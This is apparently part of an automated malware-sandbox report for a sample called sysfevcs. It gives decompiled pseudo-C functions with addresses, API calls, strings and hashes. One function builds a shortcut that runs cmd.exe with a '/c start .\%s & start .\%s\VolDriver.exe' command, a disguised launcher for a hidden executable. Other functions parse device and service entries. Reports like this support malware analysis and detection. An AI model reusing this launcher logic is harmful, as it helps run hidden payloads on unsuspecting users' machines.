                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"deviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c641
                                                                                                                                                                                                                                                                  0x0040c647
                                                                                                                                                                                                                                                                  0x0040c650
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c656
                                                                                                                                                                                                                                                                  0x0040c660
                                                                                                                                                                                                                                                                  0x0040c664
                                                                                                                                                                                                                                                                  0x0040c66d
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c753
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c685
                                                                                                                                                                                                                                                                  0x0040c68f
                                                                                                                                                                                                                                                                  0x0040c698
                                                                                                                                                                                                                                                                  0x0040c6a3
                                                                                                                                                                                                                                                                  0x0040c6b3
                                                                                                                                                                                                                                                                  0x0040c6c4
                                                                                                                                                                                                                                                                  0x0040c6c6
                                                                                                                                                                                                                                                                  0x0040c6d7
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6e0
                                                                                                                                                                                                                                                                  0x0040c6ea
                                                                                                                                                                                                                                                                  0x0040c6f3
                                                                                                                                                                                                                                                                  0x0040c6fb
                                                                                                                                                                                                                                                                  0x0040c703
                                                                                                                                                                                                                                                                  0x0040c713
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c718
                                                                                                                                                                                                                                                                  0x0040c71b
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c71f
                                                                                                                                                                                                                                                                  0x0040c725
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c731
                                                                                                                                                                                                                                                                  0x0040c6de
                                                                                                                                                                                                                                                                  0x0040c733
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c737
                                                                                                                                                                                                                                                                  0x0040c73d
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x0040c745
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c751
                                                                                                                                                                                                                                                                  0x0040c741
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c675
                                                                                                                                                                                                                                                                  0x0040c758
                                                                                                                                                                                                                                                                  0x0040c75e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040C6BC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C70B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C71F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C737
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: device$deviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                                  • Opcode ID: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction ID: 532aa4dde8cf7c978606d0783557ede9d9c92c9104aa6674e128487fd0e03548
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8821eec2211d46de2a1f32b3609261cf7a0dfdf6b7a2cf47af531bb2dbcbf3b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131DA75A0020ADFCB14DF98C884BAFB7B5BF48304F108669E515B73A0D778AA45CF95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                                                                                                                  			E0040C461() {
                                                                                                                                                                                                                                                                  				void* _t85;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0:
                                                                                                                                                                                                                                                                  				while(1) {
                                                                                                                                                                                                                                                                  					L0:
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L2:
                                                                                                                                                                                                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                  					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                  						L18:
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L4:
                                                                                                                                                                                                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                  						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                  						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                  							L6:
                                                                                                                                                                                                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                  								L7:
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040BF20( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                  									L8:
                                                                                                                                                                                                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                  									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                  										L10:
                                                                                                                                                                                                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										L12:
                                                                                                                                                                                                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									L13:
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L14:
                                                                                                                                                                                                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						L15:
                                                                                                                                                                                                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                  							L17:
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                  							goto L18;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L19:
                                                                                                                                                                                                                                                                  				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                  			}




                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c461
                                                                                                                                                                                                                                                                  0x0040c467
                                                                                                                                                                                                                                                                  0x0040c470
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c476
                                                                                                                                                                                                                                                                  0x0040c480
                                                                                                                                                                                                                                                                  0x0040c484
                                                                                                                                                                                                                                                                  0x0040c48d
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c573
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4a5
                                                                                                                                                                                                                                                                  0x0040c4af
                                                                                                                                                                                                                                                                  0x0040c4b8
                                                                                                                                                                                                                                                                  0x0040c4c3
                                                                                                                                                                                                                                                                  0x0040c4d3
                                                                                                                                                                                                                                                                  0x0040c4e4
                                                                                                                                                                                                                                                                  0x0040c4e6
                                                                                                                                                                                                                                                                  0x0040c4f7
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c500
                                                                                                                                                                                                                                                                  0x0040c50a
                                                                                                                                                                                                                                                                  0x0040c513
                                                                                                                                                                                                                                                                  0x0040c51b
                                                                                                                                                                                                                                                                  0x0040c523
                                                                                                                                                                                                                                                                  0x0040c533
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c538
                                                                                                                                                                                                                                                                  0x0040c53b
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c53f
                                                                                                                                                                                                                                                                  0x0040c545
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c551
                                                                                                                                                                                                                                                                  0x0040c4fe
                                                                                                                                                                                                                                                                  0x0040c553
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c557
                                                                                                                                                                                                                                                                  0x0040c55d
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x0040c565
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c571
                                                                                                                                                                                                                                                                  0x0040c561
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040c495
                                                                                                                                                                                                                                                                  0x0040c578
                                                                                                                                                                                                                                                                  0x0040c57e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C4DC
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C52B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C53F
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C557
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                  • String ID: service$serviceType
                                                                                                                                                                                                                                                                  • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                  • Opcode ID: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction ID: cc6604a93b73a9dd26e6b7eb0b4db72dd5c120a31dbd941355632c204e5cc99b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35a86a95f943aca3dfe219b5fe5441f437489e929dbbc6b6899da0c23cce14ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC31FD75A0011AEBCB14DF98DC84AAFB7B5AF48304F108669E514B73A0D738A985CB94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E004076A0(signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 | _a4;
                                                                                                                                                                                                                                                                  				_a8 = _a8 | _a8;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				L0040EB18();
                                                                                                                                                                                                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                                                                                                                                                                                                  				return _a4;
                                                                                                                                                                                                                                                                  			}



                                                                                                                                                                                                                                                                  0x004076ad
                                                                                                                                                                                                                                                                  0x004076be
                                                                                                                                                                                                                                                                  0x004076c7
                                                                                                                                                                                                                                                                  0x004076ca
                                                                                                                                                                                                                                                                  0x004076e0
                                                                                                                                                                                                                                                                  0x004076fc
                                                                                                                                                                                                                                                                  0x00407705
                                                                                                                                                                                                                                                                  0x00407708
                                                                                                                                                                                                                                                                  0x0040771e
                                                                                                                                                                                                                                                                  0x0040773a
                                                                                                                                                                                                                                                                  0x00407743
                                                                                                                                                                                                                                                                  0x00407746
                                                                                                                                                                                                                                                                  0x00407752

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 673498613-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction ID: 5c97871b7af6941603d612d690eec0be109c5698e055a0afcac2a9503b7b8ad0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ea7b64097fb68af6753185209a0c413dd0031376398f2c807c5146dc0d87a2e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2114F326005186B9B10EF5EC48268ABBE6EFC43A0B14C176FC2CCF319D634E9514BD8
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                                                                                                                                  			E00404AA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				void* _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				short _v540;
                                                                                                                                                                                                                                                                  				char* _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                  				_t37 =  &_v12;
                                                                                                                                                                                                                                                                  				__imp__CoCreateInstance(0x40f338, 0, 1, 0x40f328, _t37);
                                                                                                                                                                                                                                                                  				_v8 = _t37;
                                                                                                                                                                                                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x412c2c, 0x412c2c);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                                                                                                                                                                                                  					_t42 =  *_v12;
                                                                                                                                                                                                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                                                                                                                                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x40f348,  &_v16);
                                                                                                                                                                                                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t37;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x00404aab
                                                                                                                                                                                                                                                                  0x00404ab1
                                                                                                                                                                                                                                                                  0x00404ac3
                                                                                                                                                                                                                                                                  0x00404ac9
                                                                                                                                                                                                                                                                  0x00404ad0
                                                                                                                                                                                                                                                                  0x00404af6
                                                                                                                                                                                                                                                                  0x00404b10
                                                                                                                                                                                                                                                                  0x00404b1d
                                                                                                                                                                                                                                                                  0x00404b23
                                                                                                                                                                                                                                                                  0x00404b26
                                                                                                                                                                                                                                                                  0x00404b36
                                                                                                                                                                                                                                                                  0x00404b4b
                                                                                                                                                                                                                                                                  0x00404b63
                                                                                                                                                                                                                                                                  0x00404b6a
                                                                                                                                                                                                                                                                  0x00404b84
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404ba0
                                                                                                                                                                                                                                                                  0x00404ba5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404AAB
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0040F338,00000000,00000001,0040F328,?), ref: 00404AC3
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404AF6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %windir%\System32\cmd.exe, xrefs: 00404AFF
                                                                                                                                                                                                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404AEA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                  • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                  • Opcode ID: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction ID: a0a101224a9dd2f89691b4f744d4c3830e9e87c60b690d54722ae6d8de60f7c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A31EC75A40208EFCB04DF98C884FDEB7B5EF8C704F2081A9E605A73A1D674AE85CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                                                                                                  			E00407290(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040729b
                                                                                                                                                                                                                                                                  0x0040729e
                                                                                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                                                                                  0x004072bc
                                                                                                                                                                                                                                                                  0x004072c8
                                                                                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                                                                                  0x004072d7
                                                                                                                                                                                                                                                                  0x004072da
                                                                                                                                                                                                                                                                  0x004072e6
                                                                                                                                                                                                                                                                  0x004072eb
                                                                                                                                                                                                                                                                  0x004072ee
                                                                                                                                                                                                                                                                  0x004072fc

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 435966717-0
                                                                                                                                                                                                                                                                  • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction ID: 9f754f3137e0fb20398a7b2bfdd3e3c1f04f25ec4d5826fc008780c671618def
